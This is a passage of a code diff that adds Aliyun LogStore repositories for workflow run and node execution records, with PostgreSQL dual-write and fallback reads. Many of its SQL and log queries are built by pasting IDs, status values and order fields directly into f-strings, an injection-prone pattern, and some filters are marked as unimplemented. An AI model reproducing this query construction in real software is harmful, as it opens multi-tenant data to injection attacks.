last record + last_id_filter = "" + if last_id: + # TODO: Implement proper cursor-based pagination with created_at + logger.warning("last_id pagination not fully implemented for LogStore") + + # Use window function to get latest log_version of each workflow run + sql = f""" + SELECT * FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND ({triggered_from_filter}) + {status_filter} + {last_id_filter} + ) t + WHERE rn = 1 + ORDER BY created_at DESC + LIMIT {limit + 1} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore, from_time=None, to_time=None + ) + + # Check if there are more records + has_more = len(results) > limit + if has_more: + results = results[:limit] + + # Convert results to WorkflowRun models + workflow_runs = [_dict_to_workflow_run(row) for row in results] + return InfiniteScrollPagination(data=workflow_runs, limit=limit, has_more=has_more) + + except Exception: + logger.exception("Failed to get paginated workflow runs from LogStore") + raise + + def get_workflow_run_by_id( + self, + tenant_id: str, + app_id: str, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID with tenant and app isolation. + + Uses query syntax to get raw logs and selects the one with max log_version in code. + Falls back to PostgreSQL if not found in LogStore (for data consistency during migration). + """ + logger.debug("get_workflow_run_by_id: tenant_id=%s, app_id=%s, run_id=%s", tenant_id, app_id, run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND tenant_id = '{tenant_id}' AND app_id = '{app_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id} and tenant_id: {tenant_id} and app_id: {app_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug( + "WorkflowRun not found in LogStore, falling back to PostgreSQL: " + "run_id=%s, tenant_id=%s, app_id=%s", + run_id, + tenant_id, + app_id, + ) + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run by ID from LogStore: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + except Exception: + logger.exception( + "PostgreSQL fallback also failed: run_id=%s, tenant_id=%s, app_id=%s", run_id, tenant_id, app_id + ) + raise + + def _fallback_get_workflow_run_by_id_with_tenant( + self, run_id: str, tenant_id: str, app_id: str + ) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore (with tenant isolation).""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where( + WorkflowRun.id == run_id, WorkflowRun.tenant_id == tenant_id, WorkflowRun.app_id == app_id + ) + return session.scalar(stmt) + + def get_workflow_run_by_id_without_tenant( + self, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID without tenant/app context. + Uses query syntax to get raw logs and selects the one with max log_version. + Falls back to PostgreSQL if not found in LogStore (controlled by LOGSTORE_DUAL_READ_ENABLED). + """ + logger.debug("get_workflow_run_by_id_without_tenant: run_id=%s", run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug("WorkflowRun not found in LogStore, falling back to PostgreSQL: run_id=%s", run_id) + return self._fallback_get_workflow_run_by_id(run_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run without tenant: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id(run_id) + except Exception: + logger.exception("PostgreSQL fallback also failed: run_id=%s", run_id) + raise + + def _fallback_get_workflow_run_by_id(self, run_id: str) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore.""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where(WorkflowRun.id == run_id) + return session.scalar(stmt) + + def get_workflow_runs_count( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + status: str | None = None, + time_range: str | None = None, + ) -> dict[str, int]: + """ + Get workflow runs count statistics grouped by status. + + Optimization: Use finished_at IS NOT NULL for completed runs (10-50x faster) + """ + logger.debug( + "get_workflow_runs_count: tenant_id=%s, app_id=%s, triggered_from=%s, status=%s", + tenant_id, + app_id, + triggered_from, + status, + ) + # Build time range filter + time_filter = "" + if time_range: + # TODO: Parse time_range and convert to from_time/to_time + logger.warning("time_range filter not implemented") + + # If status is provided, simple count + if status: + if status == "running": + # Running status requires window function + sql = f""" + SELECT COUNT(*) as count + FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='running' + {time_filter} + ) t + WHERE rn = 1 + """ + else: + # Finished status uses optimized filter + sql = f""" + SELECT COUNT(DISTINCT id) as count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='{status}' + AND finished_at IS NOT NULL + {time_filter} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + count = results[0]["count"] if results and len(results) > 0 else 0 + + return { + "total": count, + "running": count if status == "running" else 0, + "succeeded": count if status == "succeeded" else 0, + "failed": count if status == "failed" else 0, + "stopped": count if status == "stopped" else 0, + "partial-succeeded": count if status == "partial-succeeded" else 0, + } + except Exception: + logger.exception("Failed to get workflow runs count") + raise + + # No status filter - get counts grouped by status + # Use optimized query for finished runs, separate query for running + try: + # Count finished runs grouped by status + finished_sql = f""" + SELECT status, COUNT(DISTINCT id) as count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY status + """ + + # Count running runs + running_sql = f""" + SELECT COUNT(*) as count + FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='running' + {time_filter} + ) t + WHERE rn = 1 + """ + + finished_results = self.logstore_client.execute_sql( + sql=finished_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + running_results = self.logstore_client.execute_sql( + sql=running_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + # Build response + status_counts = { + "running": 0, + "succeeded": 0, + "failed": 0, + "stopped": 0, + "partial-succeeded": 0, + } + + total = 0 + for result in finished_results: + status_val = result.get("status") + count = result.get("count", 0) + if status_val in status_counts: + status_counts[status_val] = count + total += count + + # Add running count + running_count = running_results[0]["count"] if running_results and len(running_results) > 0 else 0 + status_counts["running"] = running_count + total += running_count + + return {"total": total} | status_counts + + except Exception: + logger.exception("Failed to get workflow runs count") + raise + + def get_daily_runs_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyRunsStats]: + """ + Get daily runs statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT id) (20-100x faster) + """ + logger.debug( + "get_daily_runs_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", tenant_id, app_id, triggered_from + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + # Optimized query: Use finished_at filter to avoid window function + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT id) as runs + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "runs": row.get("runs", 0)}) + + return cast(list[DailyRunsStats], response_data) + + except Exception: + logger.exception("Failed to get daily runs statistics") + raise + + def get_daily_terminals_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTerminalsStats]: + """ + Get daily terminals statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT created_by) (20-100x faster) + """ + logger.debug( + "get_daily_terminals_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT created_by) as terminal_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "terminal_count": row.get("terminal_count", 0)}) + + return cast(list[DailyTerminalsStats], response_data) + + except Exception: + logger.exception("Failed to get daily terminals statistics") + raise + + def get_daily_token_cost_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTokenCostStats]: + """ + Get daily token cost statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + SUM(total_tokens) (20-100x faster) + """ + logger.debug( + "get_daily_token_cost_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, SUM(total_tokens) as token_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "token_count": row.get("token_count", 0)}) + + return cast(list[DailyTokenCostStats], response_data) + + except Exception: + logger.exception("Failed to get daily token cost statistics") + raise + + def get_average_app_interaction_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[AverageInteractionStats]: + """ + Get average app interaction statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + AVG (20-100x faster) + """ + logger.debug( + "get_average_app_interaction_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT + AVG(sub.interactions) AS interactions, + sub.date + FROM ( + SELECT + DATE(from_unixtime(__time__)) AS date, + created_by, + COUNT(DISTINCT id) AS interactions + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date, created_by + ) sub + GROUP BY sub.date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append( + { + "date": str(row.get("date", "")), + "interactions": float(row.get("interactions", 0)), + } + ) + + return cast(list[AverageInteractionStats], response_data) + + except Exception: + logger.exception("Failed to get average app interaction statistics") + raise diff --git a/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py new file mode 100644 index 0000000000..6e6631cfef --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py @@ -0,0 +1,164 @@ +import json +import logging +import os +import time +from typing import Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.repositories.sqlalchemy_workflow_execution_repository import SQLAlchemyWorkflowExecutionRepository +from core.workflow.entities import WorkflowExecution +from core.workflow.repositories.workflow_execution_repository import WorkflowExecutionRepository +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, +) +from models.enums import WorkflowRunTriggeredFrom + +logger = logging.getLogger(__name__) + + +class LogstoreWorkflowExecutionRepository(WorkflowExecutionRepository): + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowRunTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (DEBUGGING or APP_RUN) + """ + logger.debug( + "LogstoreWorkflowExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + # Note: Project/logstore/index initialization is done at app startup via ext_logstore + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowExecution) -> list[tuple[str, str]]: + """ + Convert a domain model to a logstore model (List[Tuple[str, str]]). + + Args: + domain_model: The domain model to convert + + Returns: + The logstore model as a list of key-value tuples + """ + logger.debug( + "_to_logstore_model: id=%s, workflow_id=%s, status=%s", + domain_model.id_, + domain_model.workflow_id, + domain_model.status.value, + ) + # Use values from constructor if provided + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + logstore_model = [ + ("id", domain_model.id_), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("type", domain_model.workflow_type.value), + ("version", domain_model.workflow_version), + ("graph", json.dumps(domain_model.graph, ensure_ascii=False) if domain_model.graph else "{}"), + ("inputs", json.dumps(domain_model.inputs, ensure_ascii=False) if domain_model.inputs else "{}"), + ("outputs", json.dumps(domain_model.outputs, ensure_ascii=False) if domain_model.outputs else "{}"), + ("status", domain_model.status.value), + ("error_message", domain_model.error_message or ""), + ("total_tokens", str(domain_model.total_tokens)), + ("total_steps", str(domain_model.total_steps)), + ("exceptions_count", str(domain_model.exceptions_count)), + ( + "created_by_role", + self._creator_user_role.value + if hasattr(self._creator_user_role, "value") + else str(self._creator_user_role), + ), + ("created_by", self._creator_user_id), + ("started_at", domain_model.started_at.isoformat() if domain_model.started_at else ""), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowExecution) -> None: + """ + Save or update a WorkflowExecution domain entity to the logstore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Persists the logstore model using Aliyun SLS + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Args: + execution: The WorkflowExecution domain entity to persist + """ + logger.debug( + "save: id=%s, workflow_id=%s, status=%s", execution.id_, execution.workflow_id, execution.status.value + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_execution_logstore, logstore_model) + + logger.debug("Saved workflow execution to logstore: id=%s", execution.id_) + except Exception: + logger.exception("Failed to save workflow execution to logstore: id=%s", execution.id_) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved workflow execution to SQL database: id=%s", execution.id_) + except Exception: + logger.exception("Failed to dual-write workflow execution to SQL database: id=%s", execution.id_) + # Don't raise - LogStore write succeeded, SQL is just a backup diff --git a/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py new file mode 100644 index 0000000000..400a089516 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py @@ -0,0 +1,366 @@ +""" +LogStore implementation of the WorkflowNodeExecutionRepository. + +This module provides a LogStore-based repository for WorkflowNodeExecution entities, +using Aliyun SLS LogStore with append-only writes and version control. +""" + +import json +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.model_runtime.utils.encoders import jsonable_encoder +from core.repositories import SQLAlchemyWorkflowNodeExecutionRepository +from core.workflow.entities import WorkflowNodeExecution +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionMetadataKey, WorkflowNodeExecutionStatus +from core.workflow.enums import NodeType +from core.workflow.repositories.workflow_node_execution_repository import OrderConfig, WorkflowNodeExecutionRepository +from core.workflow.workflow_type_encoder import WorkflowRuntimeTypeConverter +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, + WorkflowNodeExecutionTriggeredFrom, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution(data: dict[str, Any]) -> WorkflowNodeExecution: + """ + Convert LogStore result dictionary to WorkflowNodeExecution domain model. + + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecution domain model instance + """ + logger.debug("_dict_to_workflow_node_execution: data keys=%s", list(data.keys())[:5]) + # Parse JSON fields + inputs = json.loads(data.get("inputs", "{}")) + process_data = json.loads(data.get("process_data", "{}")) + outputs = json.loads(data.get("outputs", "{}")) + metadata = json.loads(data.get("execution_metadata", "{}")) + + # Convert metadata to domain enum keys + domain_metadata = {} + for k, v in metadata.items(): + try: + domain_metadata[WorkflowNodeExecutionMetadataKey(k)] = v + except ValueError: + # Skip invalid metadata keys + continue + + # Convert status to domain enum + status = WorkflowNodeExecutionStatus(data.get("status", "running")) + + # Parse datetime fields + created_at = datetime.fromisoformat(data.get("created_at", "")) if data.get("created_at") else datetime.now() + finished_at = datetime.fromisoformat(data.get("finished_at", "")) if data.get("finished_at") else None + + return WorkflowNodeExecution( + id=data.get("id", ""), + node_execution_id=data.get("node_execution_id"), + workflow_id=data.get("workflow_id", ""), + workflow_execution_id=data.get("workflow_run_id"), + index=int(data.get("index", 0)), + predecessor_node_id=data.get("predecessor_node_id"), + node_id=data.get("node_id", ""), + node_type=NodeType(data.get("node_type", "start")), + title=data.get("title", ""), + inputs=inputs, + process_data=process_data, + outputs=outputs, + status=status, + error=data.get("error"), + elapsed_time=float(data.get("elapsed_time", 0.0)), + metadata=domain_metadata, + created_at=created_at, + finished_at=finished_at, + ) + + +class LogstoreWorkflowNodeExecutionRepository(WorkflowNodeExecutionRepository): + """ + LogStore implementation of the WorkflowNodeExecutionRepository interface. + + This implementation uses Aliyun SLS LogStore with an append-only write strategy: + - Each save() operation appends a new record with a version timestamp + - Updates are simulated by writing new records with higher version numbers + - Queries retrieve the latest version using finished_at IS NOT NULL filter + - Multi-tenancy is maintained through tenant_id filtering + + Version Strategy: + version = time.time_ns() # Nanosecond timestamp for unique ordering + """ + + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowNodeExecutionTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (SINGLE_STEP or WORKFLOW_RUN) + """ + logger.debug( + "LogstoreWorkflowNodeExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowNodeExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowNodeExecution) -> Sequence[tuple[str, str]]: + logger.debug( + "_to_logstore_model: id=%s, node_id=%s, status=%s", + domain_model.id, + domain_model.node_id, + domain_model.status.value, + ) + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + json_converter = WorkflowRuntimeTypeConverter() + + logstore_model = [ + ("id", domain_model.id), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("workflow_run_id", domain_model.workflow_execution_id or ""), + ("index", str(domain_model.index)), + ("predecessor_node_id", domain_model.predecessor_node_id or ""), + ("node_execution_id", domain_model.node_execution_id or ""), + ("node_id", domain_model.node_id), + ("node_type", domain_model.node_type.value), + ("title", domain_model.title), + ( + "inputs", + json.dumps(json_converter.to_json_encodable(domain_model.inputs), ensure_ascii=False) + if domain_model.inputs + else "{}", + ), + ( + "process_data", + json.dumps(json_converter.to_json_encodable(domain_model.process_data), ensure_ascii=False) + if domain_model.process_data + else "{}", + ), + ( + "outputs", + json.dumps(json_converter.to_json_encodable(domain_model.outputs), ensure_ascii=False) + if domain_model.outputs + else "{}", + ), + ("status", domain_model.status.value), + ("error", domain_model.error or ""), + ("elapsed_time", str(domain_model.elapsed_time)), + ( + "execution_metadata", + json.dumps(jsonable_encoder(domain_model.metadata), ensure_ascii=False) + if domain_model.metadata + else "{}", + ), + ("created_at", domain_model.created_at.isoformat() if domain_model.created_at else ""), + ("created_by_role", self._creator_user_role.value), + ("created_by", self._creator_user_id), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update a NodeExecution domain entity to LogStore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Appends a new record with a log_version timestamp + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Each save operation creates a new record. Updates are simulated by writing + new records with higher log_version numbers. + + Args: + execution: The NodeExecution domain entity to persist + """ + logger.debug( + "save: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_node_execution_logstore, logstore_model) + + logger.debug( + "Saved node execution to LogStore: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + except Exception: + logger.exception( + "Failed to save node execution to LogStore: id=%s, node_execution_id=%s", + execution.id, + execution.node_execution_id, + ) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved node execution to SQL database: id=%s", execution.id) + except Exception: + logger.exception("Failed to dual-write node execution to SQL database: id=%s", execution.id) + # Don't raise - LogStore write succeeded, SQL is just a backup + + def save_execution_data(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update the inputs, process_data, or outputs associated with a specific + node_execution record. + + For LogStore implementation, this is similar to save() since we always write + complete records. We append a new record with updated data fields. + + Args: + execution: The NodeExecution instance with data to save + """ + logger.debug("save_execution_data: id=%s, node_execution_id=%s", execution.id, execution.node_execution_id) + # In LogStore, we simply write a new complete record with the data + # The log_version timestamp will ensure this is treated as the latest version + self.save(execution) + + def get_by_workflow_run( + self, + workflow_run_id: str, + order_config: OrderConfig | None = None, + ) -> Sequence[WorkflowNodeExecution]: + """ + Retrieve all NodeExecution instances for a specific workflow run. + Uses LogStore SQL query with finished_at IS NOT NULL filter for deduplication. + This ensures we only get the final version of each node execution. + Args: + workflow_run_id: The workflow run ID + order_config: Optional configuration for ordering results + order_config.order_by: List of fields to order by (e.g., ["index", "created_at"]) + order_config.order_direction: Direction to order ("asc" or "desc") + + Returns: + A list of NodeExecution instances + + Note: + This method filters by finished_at IS NOT NULL to avoid duplicates from + version updates. For complete history including intermediate states, + a different query strategy would be needed. + """ + logger.debug("get_by_workflow_run: workflow_run_id=%s, order_config=%s", workflow_run_id, order_config) + # Build SQL query with deduplication using finished_at IS NOT NULL + # This optimization avoids window functions for common case where we only + # want the final state of each node execution + + # Build ORDER BY clause + order_clause = "" + if order_config and order_config.order_by: + order_fields = [] + for field in order_config.order_by: + # Map domain field names to logstore field names if needed + field_name = field + if order_config.order_direction == "desc": + order_fields.append(f"{field_name} DESC") + else: + order_fields.append(f"{field_name} ASC") + if order_fields: + order_clause = "ORDER BY " + ", ".join(order_fields) + + sql = f""" + SELECT * + FROM {AliyunLogStore.workflow_node_execution_logstore} + WHERE 